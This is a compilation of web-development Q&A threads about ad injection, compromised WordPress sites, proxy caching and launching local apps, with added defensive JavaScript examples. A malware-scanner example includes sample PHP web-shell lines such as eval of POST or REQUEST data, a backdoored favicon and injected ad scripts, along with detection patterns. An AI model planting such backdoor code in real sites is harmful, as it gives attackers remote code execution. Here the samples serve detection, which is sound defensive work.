Ads appearing in our application when they should not be - security

I had a strange issue from one of my customers this morning, who uses my web application. Apparently they are getting "ads" within the browser window when using my application.
I do not put ads in at all. It's a straightforward ASP.NET web application.
What I believe is happening in this case is that the end user has some malware on their PC which "hops" onto their browser session to display their "wares". It could happen to any website they are perusing, I guess. I recommended they scan their PC with Malwarebytes.
Is this something that is under the control of the end user, or are there things web application developers can do to prevent this happening? Also, some pointers as to how these "ad browser hijackers" work would be good.
Thanks.
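An added example, not part of the question above: one thing the application itself can do is notice when something other than the app adds scripts, frames or images to its own DOM and report it. A hijacker that injects ads (a malicious extension, a trojan hooking the browser, or a proxy rewriting plain HTTP) almost always does so by inserting script/iframe nodes that point at origins the application never loads from. The allowlisted origins (https://app.example, https://cdn.app.example), the reporting endpoint /security/injected-resource and the sample nodes are all assumptions constructed for the example; the classification logic takes plain {tag, src} records so the same function can be exercised outside a browser.

```javascript
// Added example (not from the original post): flag script/iframe/img resources
// whose origin is not in the application's own allowlist. In the browser the
// MutationObserver below feeds it real DOM elements; in Node it takes plain
// {tag, src} records, which is how the constructed sample at the bottom is run.

// Assumed allowlist for a hypothetical app served from https://app.example.
const ALLOWED_ORIGINS = new Set(['https://app.example', 'https://cdn.app.example']);
const WATCHED_TAGS = new Set(['SCRIPT', 'IFRAME', 'IMG', 'LINK', 'OBJECT', 'EMBED']);
const APP_BASE = 'https://app.example/';   // base for resolving relative src values

// Classify one resource reference. Returns null when the resource is expected,
// otherwise a finding object with the reason it was flagged.
function classifyResource(node, allowed = ALLOWED_ORIGINS, baseUrl = APP_BASE) {
  const tag = String(node.tag || node.tagName || '').toUpperCase();
  if (!WATCHED_TAGS.has(tag)) return null;
  // Real elements expose .src (''/undefined when absent); fall back to attributes.
  const src = node.src ?? node.getAttribute?.('src') ?? node.getAttribute?.('href') ?? null;
  if (src === null || src === '') {
    // An inline <script> with no src is how many injected ad loaders start.
    return tag === 'SCRIPT' ? { tag, src: null, reason: 'inline-script' } : null;
  }
  let url;
  try {
    url = new URL(src, baseUrl);              // resolves "/x.js" and "//host/x.js"
  } catch {
    return { tag, src, reason: 'unparseable-url' };
  }
  if (['data:', 'blob:', 'javascript:'].includes(url.protocol)) {
    return { tag, src, reason: `${url.protocol}-url` };
  }
  if (!allowed.has(url.origin)) {
    return { tag, src, reason: 'foreign-origin', origin: url.origin };
  }
  return null;
}

// Run over a batch of nodes (e.g. MutationRecord.addedNodes) and collect findings.
function findUnexpectedResources(nodes, allowed = ALLOWED_ORIGINS, baseUrl = APP_BASE) {
  const findings = [];
  for (const node of nodes) {
    const finding = classifyResource(node, allowed, baseUrl);
    if (finding) findings.push(finding);
  }
  return findings;
}

// Browser hookup: watch the live DOM and beacon findings to the server.
// Guarded so the same file also loads under Node.
if (typeof window !== 'undefined' && typeof MutationObserver !== 'undefined') {
  const observer = new MutationObserver((records) => {
    for (const rec of records) {
      const added = Array.from(rec.addedNodes).filter((n) => n.nodeType === 1);
      const hits = findUnexpectedResources(added, ALLOWED_ORIGINS, document.baseURI);
      if (hits.length) {
        // Hypothetical endpoint; sendBeacon survives the user navigating away.
        navigator.sendBeacon('/security/injected-resource', JSON.stringify(hits));
      }
    }
  });
  observer.observe(document.documentElement, { childList: true, subtree: true });
}

// Constructed sample: what an ad-injecting hijacker might add to the page,
// mixed with two resources the application loads itself.
const SAMPLE_ADDED_NODES = [
  { tag: 'script', src: '/static/app.js' },                         // ours (relative)
  { tag: 'img',    src: 'https://cdn.app.example/logo.png' },        // ours (CDN)
  { tag: 'script', src: 'http://ads-injector.invalid/loader.js' },  // foreign origin
  { tag: 'iframe', src: '//ads-injector.invalid/banner' },          // scheme-relative, foreign
  { tag: 'script', src: null },                                     // inline loader
];
```

Reports from this observer are telemetry, not protection: malware that owns the PC can disable the script, and a browser extension is normally exempt from the page's Content-Security-Policy, so CSP reporting alone would miss it. What the developer can enforce is transport: serving everything over HTTPS removes the proxy-side injection case entirely, which is the one the application has any say over.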

Related

Find out whether web app or server is compromised

I'm a rather experienced web developer and have Plesk Onyx running on my dedicated server. It features 2FA via Google Authenticator. Inside Plesk, I added multiple WordPress-based webpages of mine and friends of mine. All of these WordPress installations were securely installed by Plesk and have hardened access, by moving the admin area, globally disabling comments, 2FA, and so on.
Now a few days ago, a friend told me he was seeing massive ads on my webpage. Since the server also hosts my company's page, that is perhaps something to take seriously, so I did. However, I couldn't reproduce the ads or the pop-ups, etc. at all, neither on my Windows machines (10 and Server 2016) nor on any mobile or laptop device. Yesterday, I was viewing my webpage with a friend of mine (desktop PC), and all of a sudden ads showed up when he clicked links in my WP menu and the like. Very pushy, very much, absolutely... unacceptable.
I introduced myself as a rather experienced web developer. However, I don't know how to tackle this: whether my server was actually hacked or compromised, some WordPress plugin is messing with ads (however, my friend found problems on multiple sites that are not using the same plugins), or whatever. I think Plesk and WP are both strong and shouldn't be compromised that easily. Besides, I didn't notice anything further.
How to tackle this?
Did you try Revisium Antivirus to scan your websites? It is available on Plesk extensions. I had a similar issue and Revisium Antivirus found all the files that were infected.
Also, check your friend's PC (web browser) for malware. There is some malware (hidden software) which can run ads or add strange links to your website. So, in that case, it has nothing to do with your server or websites.
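An added example, not part of either answer above, for the server-side half of the check: before or alongside a commercial scanner, a quick signature pass over the docroot finds the usual shapes of an ad injection (eval of a base64 blob, request data fed to eval, a foreign script tag or zero-size iframe in the theme footer, PHP hiding in an .ico in uploads). The rules, the site hosts (example.com) and the sample file tree are constructed for this example; it scans an in-memory map of path to content so it runs offline, and a real run feeds it the output of fs.readFileSync over the WordPress tree.

```javascript
// Added example (not from the original thread): a signature scan for the kind
// of injected PHP/JS that shows up as "ads on my WordPress site". Rules are
// assumptions based on common injection idioms, not a complete malware list.

// Hosts this (hypothetical) site legitimately loads scripts from.
const OWN_HOSTS = new Set(['example.com', 'www.example.com']);

// Line-level regex rules and the file extensions they apply to. None use the
// /g flag, so RegExp.test() carries no lastIndex state between lines.
const RULES = [
  { name: 'eval-of-decoded-payload', ext: ['.php'],
    re: /\b(eval|assert|create_function)\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(/i },
  { name: 'request-data-into-eval', ext: ['.php'],
    re: /\b(eval|assert|create_function)\s*\([^)]*\$_(GET|POST|REQUEST|COOKIE)\b/i },
  { name: 'preg_replace-e-modifier', ext: ['.php'],
    re: /preg_replace\s*\(\s*(['"])\/.*\/[a-z]*e[a-z]*\1/i },
  { name: 'long-base64-blob', ext: ['.php', '.js', '.html'],
    re: /[A-Za-z0-9+\/]{200,}={0,2}/ },
  { name: 'hidden-iframe', ext: ['.php', '.html', '.js'],
    re: /<iframe\b[^>]*((width|height)\s*=\s*["']?0\b|display\s*:\s*none)/i },
  { name: 'php-in-non-php-file', ext: ['.ico', '.jpg', '.png', '.gif', '.txt'],
    re: /<\?php\b/ },
];

function extensionOf(filePath) {
  const m = /\.[^./\\]+$/.exec(filePath);
  return m ? m[0].toLowerCase() : '';
}

// A <script src=...> pointing anywhere but our own hosts. Relative and
// scheme-relative URLs are resolved against the site before comparing, so a
// theme's "<?php echo get_template_directory_uri(); ?>/js/app.js" is not flagged.
function foreignScriptSrc(line, ownHosts = OWN_HOSTS) {
  const m = /<script\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/i.exec(line);
  if (!m) return null;
  let u;
  try { u = new URL(m[1], 'https://www.example.com/'); } catch { return m[1]; }
  return ownHosts.has(u.hostname) ? null : m[1];
}

// Scan one file's text; returns findings with 1-based line numbers.
function scanSource(filePath, text, ownHosts = OWN_HOSTS) {
  const ext = extensionOf(filePath);
  const findings = [];
  text.split(/\r?\n/).forEach((line, idx) => {
    for (const rule of RULES) {
      if (rule.ext.includes(ext) && rule.re.test(line)) {
        findings.push({ file: filePath, line: idx + 1, rule: rule.name, excerpt: line.trim().slice(0, 80) });
      }
    }
    if (ext === '.php' || ext === '.html') {
      const src = foreignScriptSrc(line, ownHosts);
      if (src) findings.push({ file: filePath, line: idx + 1, rule: 'foreign-script-src', excerpt: src });
    }
  });
  return findings;
}

// files: { relativePath: fileContent }
function scanTree(files, ownHosts = OWN_HOSTS) {
  return Object.entries(files).flatMap(([p, text]) => scanSource(p, text, ownHosts));
}

// Constructed sample tree: a theme footer with two injected lines, a clean
// plugin that legitimately calls base64_decode, a dropped PHP file in uploads,
// and an "icon" that is really a PHP backdoor.
const SAMPLE_SITE = {
  'wp-content/themes/mytheme/footer.php': [
    '<?php wp_footer(); ?>',
    '<script src="<?php echo get_template_directory_uri(); ?>/js/app.js"></script>',
    '<script src="https://www.example.com/js/analytics.js"></script>',
    '<script type="text/javascript" src="//ad-pusher.invalid/pop.js"></script>',
    '<iframe src="http://ad-pusher.invalid/f.html" width="0" height="0"></iframe>',
    '</body></html>',
  ].join('\n'),
  'wp-content/plugins/legit/legit.php': [
    '<?php',
    '$json = json_encode(base64_decode($opt["blob"]));',
    'add_action("init", "legit_init");',
  ].join('\n'),
  'wp-content/uploads/2019/05/cache.php': [
    '<?php',
    'eval(base64_decode("ZWNobyAnb3duZWQnOw=="));',
    'if (isset($_POST["c"])) { eval($_POST["c"]); }',
  ].join('\n'),
  'wp-content/uploads/2019/05/favicon.ico': '<?php @eval($_REQUEST["q"]); ?>',
};
```

Treat a clean scan as weak evidence only: ads are just as often injected from the database (a script tag stored in wp_options or in post content by a compromised plugin) as from files, and a signature list never catches every obfuscation. Pair it with an integrity check such as WP-CLI's wp core verify-checksums, which reports any core file that differs from the official release regardless of what was put in it.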

Why is my website not working with all internet service providers in my country?

My website is working with some ISPs while it is not working with others. It is also not working from other countries.
The app is hosted at our company. It was developed using SharePoint and ASP.NET.
The app works at my home.
But if I visit the website at my brother's home, who is registered with a different ISP, the website opens and a login dialog appears. When I enter the correct username and password and submit, the textboxes are cleared and the dialog comes again.
The problem is happening with many visitors.
I just want to know what the problem would be! Has anyone faced such a problem before?
I checked all IIS restrictions. There are no restrictions made.
I created a new app using SharePoint with a login page and it works great.
Somebody said that users with a public IP can access the site while others with DHCP cannot. Can somebody explain that?
Some ISPs have transparent proxies in use. And some of them are accidentally (or even intentionally) broken and cache more than they should. You can check whether that's the problem:
Set up your server to also allow https and then use that. You should move to https for privacy reasons anyways, so just do it now ;)
This way, the proxy can't do anything but to pass the data between client and server unmodified.
If that is not an option: Use tcpdump/wireshark/other-sniffer on both - client and server - at the same time and compare the logs. Did the second access even make it to the server?
Do you have a laptop/tablet/smartphone with which you can access the web server? Try moving that laptop from one location to the other and check, whether it works with that one laptop using one ISP and fails with the same laptop on the other ISP.
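An added example, not part of the answer above: the concrete way a "proxy that caches more than it should" produces exactly the symptom in the question (login dialog comes back with the fields cleared) is that the login page, or the response carrying the session cookie, is stored by the shared cache and replayed to the next user on that ISP, so their session never gets established. The function below applies a simplified reading of the HTTP caching rules (RFC 7234, with the heuristically cacheable status list from RFC 7231 section 6.1) to a response and says whether a shared cache may store it and why that is dangerous. The sample responses are constructed; ASP.NET_SessionId and .ASPXAUTH are the default ASP.NET session and forms-authentication cookie names.

```javascript
// Added example (not part of the answer): decide whether a shared cache such
// as an ISP's transparent proxy is allowed to store a response. Simplified:
// only GET/HEAD are considered storable, and no request-side headers
// (Authorization) are modelled.

// Statuses a cache may store heuristically when no explicit freshness is given.
const HEURISTIC_STATUSES = new Set([200, 203, 204, 206, 300, 301, 404, 405, 410, 414, 501]);

function parseCacheControl(value) {
  const directives = {};
  for (const part of String(value || '').split(',')) {
    const [name, raw] = part.trim().split('=');
    if (name) directives[name.toLowerCase()] = raw === undefined ? true : raw.replace(/^"|"$/g, '');
  }
  return directives;
}

// response: { method, status, headers } with header names in any case.
// Returns { storable, reasons } where reasons explain the verdict.
function sharedCacheRisk({ method = 'GET', status, headers = {} }) {
  const h = Object.fromEntries(Object.entries(headers).map(([k, v]) => [k.toLowerCase(), v]));
  const cc = parseCacheControl(h['cache-control']);
  if (method !== 'GET' && method !== 'HEAD') {
    return { storable: false, reasons: [`${method} responses are treated as unstorable here`] };
  }
  if (cc['no-store']) return { storable: false, reasons: ['Cache-Control: no-store'] };
  if (cc['private']) return { storable: false, reasons: ['Cache-Control: private keeps it out of shared caches'] };
  const explicit = cc['public'] === true || cc['s-maxage'] !== undefined ||
    cc['max-age'] !== undefined || h['expires'] !== undefined;
  if (!explicit && !HEURISTIC_STATUSES.has(status)) {
    return { storable: false, reasons: [`status ${status} has no explicit freshness and is not heuristically cacheable`] };
  }
  const reasons = [explicit
    ? 'explicit freshness permits shared caching'
    : `status ${status} is heuristically cacheable and no Cache-Control was sent`];
  if (h['pragma'] !== undefined) reasons.push('Pragma is a request directive; it does not stop a cache storing a response');
  if (h['set-cookie'] !== undefined) reasons.push('Set-Cookie would be stored and replayed to other users');
  const vary = String(h['vary'] || '').split(',').map((s) => s.trim().toLowerCase());
  if (!vary.includes('cookie') && !vary.includes('*')) {
    reasons.push('no Vary: Cookie (fine for static assets, wrong for per-user pages)');
  }
  return { storable: true, reasons };
}

// What the login page, the post-login redirect and every authenticated page
// should carry so that no intermediary stores them.
const NO_SHARED_CACHE_HEADERS = { 'Cache-Control': 'no-store, private', 'Vary': 'Cookie' };

// Constructed sample responses from a hypothetical ASP.NET login flow.
const SAMPLES = {
  loginPageAsShipped: { method: 'GET', status: 200, headers: {
    'Content-Type': 'text/html', 'Pragma': 'no-cache',
    'Set-Cookie': 'ASP.NET_SessionId=abc123; path=/; HttpOnly' } },
  loginPageFixed: { method: 'GET', status: 200, headers: {
    'Content-Type': 'text/html',
    'Set-Cookie': 'ASP.NET_SessionId=abc123; path=/; HttpOnly', ...NO_SHARED_CACHE_HEADERS } },
  postLoginRedirect: { method: 'POST', status: 302, headers: {
    'Location': '/default.aspx', 'Set-Cookie': '.ASPXAUTH=token; path=/; HttpOnly' } },
  staticScript: { method: 'GET', status: 200, headers: { 'Cache-Control': 'public, max-age=86400' } },
};
```

Sending no Cache-Control at all on a 200 login page, as the first sample does, is the common mistake: a proxy is entitled to keep it. Moving to HTTPS, as the answer recommends, makes the question moot for that proxy because it can no longer see the response, but the headers are still worth fixing for the caches that sit behind TLS termination.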
This should be a comment, but I do not have enough to post it as such.
Are you sure that it is not a browser issue?
Is the login dialog from SharePoint, your app or the browser itself?
If it is from your app, can you debug it or write the log-in attempts in a log?

Azure based Umbraco site - when logging in, I get logged back out immediately

I have recently installed a website project on Azure and that was relatively easy to do thanks to great docs online. We are having a problem with the back office (admin) login though; it's a bit strange, as it didn't happen straight away. I shall elaborate...
When I go to http://www.keelycattschoolofdance.co.uk/umbraco/ it takes me to the login page, which seems fine.
(The url at this point becomes www.keelycattschoolofdance.co.uk/.../login.aspx)
I then log in, which works, and it starts to display the admin panels, but then it bounces back to the login and the URL becomes www.keelycattschoolofdance.co.uk/.../login.aspx
I am running this on Azure using the Accelerator, latest version of Umbraco and using SQL CE 4.0 rather than SQL Server.
Has anyone seen this before?
Please let me know if you need more information, I shall respond :-)
Thanks in advance
Nick
It sounds like it may be a Session error. This is a problem for Azure and Umbraco because Azure uses round robin load balancing.
The normal way of setting up an Umbraco site using the accelerator would be to have a separate session DB where the shared session state is stored.
Make sure you are using this accelerator for Umbraco on Azure as it's the latest and best.
http://waacceleratorumbraco.codeplex.com/
We have several large production sites using this and I can confirm they all work fine (including the backend editing environment).
Things to watch out for are that you need to follow the instructions closely as they are easy to get wrong :-)
Make sure you don't have dashes in your db names as this makes things go wrong as well.
Finally if you are using more than one web role the Umbraco preview can sometimes yellow screen, as the preview XML may not be on the server that gets to the preview request. This is again because of the round robin load balancing.

Developing a web site that can be accessed through mobile phone applications

I am developing a site that is tested only in Firefox and IE. Now I need to make the site accessible from mobile as well.
So I need to know whether I need to calculate the time needed to shift the site. Is this created as a new application, or is the same application modified?
When accessing stackoverflow.com from my mobile the design is entirely changed. How is this done? Is it a separate application?
Thanks
Whether or not you need to create a new application for mobile depends on the site you have. The website at my workplace could not possibly fit on a mobile phone screen (too many frames), but other sites that have a more adjustment-friendly layout might just need a little tweak.
I would test your site on a mobile browser emulator, there are a bunch of them listed on this site.
Also, you might consider switching your Firefox's user agent (here) so you can browse popular sites' mobile versions, along with the source they used to lay them out.
Usually different CSS templates are chosen using UA string matching. My phone has a fairly fully enabled web browser on it, so I get the whole of stackoverflow the same.
Some phone browsers may also "mobile optimise" the layout, or in the case of Opera Mini, it does it on Opera's proxy server and then sends modified data to the phone.
JavaScript support is more of a problem; expect it to be minimal in most cases, although it is getting better.

Good reasons for not letting the browser launch local applications

I know this might be a no-brainer, but please read on.
I also know it's generally not considered a good idea, maybe the worst, to let a browser run and interact with local apps, even in an intranet context.
We use Citrix for home-office, and people really like it. Now, they would like the same kind of environment at work, a nice page where every important application/document/folder is nicely arranged and classified in an orderly fashion. These folks are not particularly tech savvy; I don't even think that they could understand the difference between remotely delivered applications and local ones.
So, I've been asked if it's possible. Of course, it is, with IE's good ol' ActiveX controls. And I even made a working prototype (that's where it hurts).
But now I have doubts. Isn't it madness to allow such 'dangerous' ActiveX controls, even in the 'local intranet' zone? People will use the same browser to surf the web; can I fully trust IE? Isn't there a risk that Microsoft would just disable those controls in future updates/versions? What if a website, or any kind of malware, just put another site on the trust list? With that extent of control, you might as well uninstall every protection and just run amok 'till you get hanged by the IT dept.
I'm about to confront my superiors with the fact that, even if they saw that it is doable, it would be a very bad thing. So I'm desperately in need of good and strong arguments, because "let's not" won't do it.
Of course, if there is nothing to be scared of, that'll be nice too. But I strongly doubt that.
We use Citrix for home-office, and people really like it. Now, they would like the same kind of environment at work, a nice page where every important application/document/folder is nicely arranged and classified in an orderly fashion
I haven't used Citrix very many times, but what's it got to do with executing local applications? I don't see how "People like Citrix" and "browser executing local applications" relate at all?
If the people are accessing your Citrix server from home, and want the same experience in the office, then buy a cheap PC, and run the exact same Citrix software they run on their home computers. Put this computer in the corner and tell them to go use it. They'll be overjoyed.
Isn't it madness to allow such 'dangerous' ActiveX controls, even in the 'local intranet' zone? People will use the same browser to surf the web, can I fully trust IE?
Put it this way. IE has built-in support for AX controls. It uses its security mechanisms to prevent them from running unless in a trusted site. By default, no sites are trusted at all.
If you use IE at all then you're putting yourself at the mercy of these security mechanisms. Whether or not you tell it to trust the local intranet is beside the point, and isn't going to affect the operation of any other zones.
The good old security holes that require you to reboot your computer every few weeks when MS issues a patch will continue to exist and cause problems, regardless of whether you allow ActiveX in your local intranet.
Isn't there a risk that Microsoft would just disable those controls in future updates/versions?
Since XP-SP2, Microsoft has been making it increasingly difficult to use ActiveX controls. I don't know how many scary looking warning messages and "This might destroy your computer" dialogs you have to click through these days to get them to run, but it's quite a few. This will only get worse over time.
Microsoft is walking a fine line. On one hand, they regularly send ActiveX killbits with Windows Update to remove/disable applications that have been misbehaving. On the other hand, the latest version of Sharepoint 2007 (can't speak for earlier versions) allows for Office documents to be opened by clicking a link in the browser, and edited in the local application. When the edit is finished, the changes are transmitted back to the server and the webpage (generally) is refreshed. This is only an IE thing, as Firefox will throw up an error message.
I can see the logic behind it, though. Until Microsoft gets all of their apps 'in the cloud', there are cases that need to bridge the gap between the old client-side apps and a more web-centric business environment. While there is likely a non-web workaround, more and more information workers have come to expect that a large portion of their work will be done in a browser. Anything that makes the integration with the desktop easier is not going to be opposed by anyone except the sysadmins.
The standard Citrix homepage (or how we use it) is a simple web page with program icons. Click on one, and the application gets delivered to you. People want the same thing, at work, with their applications/folders/documents. And because I'm a web developer, and they asked me, I do it with a web page... Perhaps I should pass the whole thing over to the VB guy...
Ahh... I know of 2 ways to accomplish this:
You can embed Internet Explorer into an application, and hook into it and intercept certain kinds of URLs and so on.
I saw this done a few years ago - a telephony application embedded internet explorer in itself, and loaded some specially formatted webpages.
In the webpage there was this:
Call John Smith
Normally this would be a broken URL, but when the user clicked on this link, the application containing the embedded IE got notified, and proceeded to execute its own custom code to dial the number from the URL.
You could get your VB guy to write an application which basically just wraps IE, and has handlers for executing applications. You could then code normal webpages with links to just open applications, and the VB app would launch them. This allows you to write your own security stuff (like, only launch applications in a preset list, or so on) into the VB app, and because VB is launching them, not IE, none of the IE security issues will be involved.
The second way is with browser plug-ins.
For example, Skype comes with a Firefox plug-in, which looks for phone numbers in web pages and attaches special links to them. When you click on these links it invokes Skype; you could conceivably do something similar for launching your Citrix apps.
You'd then be tied to firefox though. Writing plugins for IE is much harder than for FF, I wouldn't go down that path unless forced to.
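An added example, not part of the answer above: the answer's first option (a host application wrapping IE, with "only launch applications in a preset list" handled by the host) stands or falls on how the host turns a clicked link into a process. The function below is that core as a pure function, independent of whether the host is VB or anything else. A link such as launch://excel?file=reports/q1.xlsx is resolved against a fixed registry, and unknown applications, unexpected or duplicated parameters, and arguments that could escape the document share or smuggle shell syntax are rejected before anything is spawned. The launch: scheme, the registry entries, executable paths and the \\fileserver\shared share are all assumptions made for the example.

```javascript
// Added example (not from the original answer): allowlisted resolution of a
// custom launch: link into an executable plus argument vector.

// Assumed registry of launchable applications and the parameters each accepts.
const REGISTRY = {
  excel:  { exe: 'C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE', params: { file: 'docpath' } },
  calc:   { exe: 'C:\\Windows\\System32\\calc.exe', params: {} },
  citrix: { exe: 'C:\\Program Files (x86)\\Citrix\\ICA Client\\wfica32.exe', params: { app: 'name' } },
};
// Only documents under this (assumed) share may be opened.
const DOC_ROOT = '\\\\fileserver\\shared\\';

const hasOwn = (obj, key) => Object.prototype.hasOwnProperty.call(obj, key);

// Validators per parameter kind. Allowlisting characters is what keeps the
// spawn safe: no quotes, backslashes, pipes or '..' segments reach the process.
const VALIDATORS = {
  name: (v) => /^[A-Za-z0-9_-]{1,64}$/.test(v),
  docpath: (v) =>
    /^[A-Za-z0-9_\-. ]+(\/[A-Za-z0-9_\-. ]+)*\.(xlsx|docx|pdf)$/.test(v) &&
    !v.split('/').some((seg) => seg === '.' || seg === '..' || seg.trim() === ''),
};

// Returns { exe, args } for a valid link, throws for anything else.
function resolveLaunch(link) {
  let url;
  try { url = new URL(link); } catch { throw new Error('malformed link'); }
  if (url.protocol !== 'launch:') throw new Error('not a launch: link');

  // hasOwn so "__proto__" or "constructor" cannot resolve to inherited
  // properties of the plain-object registry.
  const app = url.hostname.toLowerCase();
  if (!hasOwn(REGISTRY, app)) throw new Error(`unknown application: ${app}`);
  const entry = REGISTRY[app];

  const args = [];
  const seen = new Set();
  for (const [key, value] of url.searchParams) {        // values arrive percent-decoded
    if (!hasOwn(entry.params, key)) throw new Error(`unexpected parameter: ${key}`);
    if (seen.has(key)) throw new Error(`duplicate parameter: ${key}`);
    seen.add(key);
    const kind = entry.params[key];
    if (!VALIDATORS[kind](value)) throw new Error(`invalid ${key}`);
    args.push(kind === 'docpath' ? DOC_ROOT + value.replace(/\//g, '\\') : value);
  }
  for (const key of Object.keys(entry.params)) {
    if (!seen.has(key)) throw new Error(`missing parameter: ${key}`);
  }
  // The host hands exe and args to an API that takes an argument vector
  // (execFile-style wrappers over CreateProcess), never to a shell string.
  return { exe: entry.exe, args };
}
```

The same shape applies if the host is replaced by a registered protocol handler: the handler receives the whole URL as one argument and must do this validation itself, because once a scheme is registered any web page, not just the intranet portal, can emit a link for it.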
